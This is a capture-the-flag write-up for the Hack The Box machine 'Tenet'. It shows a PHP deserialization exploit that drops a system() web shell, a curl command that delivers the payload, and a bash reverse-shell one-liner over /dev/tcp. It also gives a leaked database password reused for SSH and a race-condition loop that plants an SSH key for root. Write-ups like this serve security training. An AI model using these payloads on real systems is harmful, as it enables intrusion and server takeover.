HTB Tenet

Writeup for Tenet box on

Initial Enumration

nmap -sC -sV -vv -oA tcp -Pn

Found wordpress

Seems like wordpress is set to resove the http://tenet.htb/

[+] protagonist
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://tenet.htb/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] neil
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)



found which allows us to download the sourcecode

The exploit


class DatabaseExport
	public $user_file = 'sh.php';
	public $data = '<?php if(isset($_REQUEST["s"])){ echo "<pre>";system($_REQUEST["s"]); echo"</pre>"; } ?>';

	public function update_db()
		echo '[+] Grabbing users from text file <br>';
		$this-> data = '';

	public function __destruct()
		file_put_contents(__DIR__ . '/' . $this ->user_file, $this->data);
		echo '[+] Database updated <br>';
	//	echo 'Gotta get this working properly...';

$d = serialize(new DatabaseExport());

The above file will generate a serialised version of DatabseExport class which we can send over to sator.php file

curl '"DatabaseExport":2:{s:9:"user_file";s:6:"sh.php";s:4:"data";s:88:"<?php if(isset($_REQUEST["s"])){ echo "<pre>";system($_REQUEST["s"]); echo"</pre>"; } ?>";}'

The arepo parameter should be urlencoded but for readability it's not.

Get a reverse shell via the web shell uploaded initially:

curl '' -d 's=/bin/bash+-c+"bash+-i+>%26+/dev/tcp/>%261"'


Mysql Credentials in wp-config.php

define( 'DB_NAME', 'wordpress' );

/** MySQL database username */
define( 'DB_USER', 'neil' );

/** MySQL database password */
define( 'DB_PASSWORD', 'Opera2112' );

The same password works for ssh as neil

User enumeration

Privilege escalation

Read / Write race condition

cd /tmp
while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAA.... [email protected]" | tee ssh-*; done

Having the while loop run in the background we then run the command as sudo which will add out ssh key to the root user.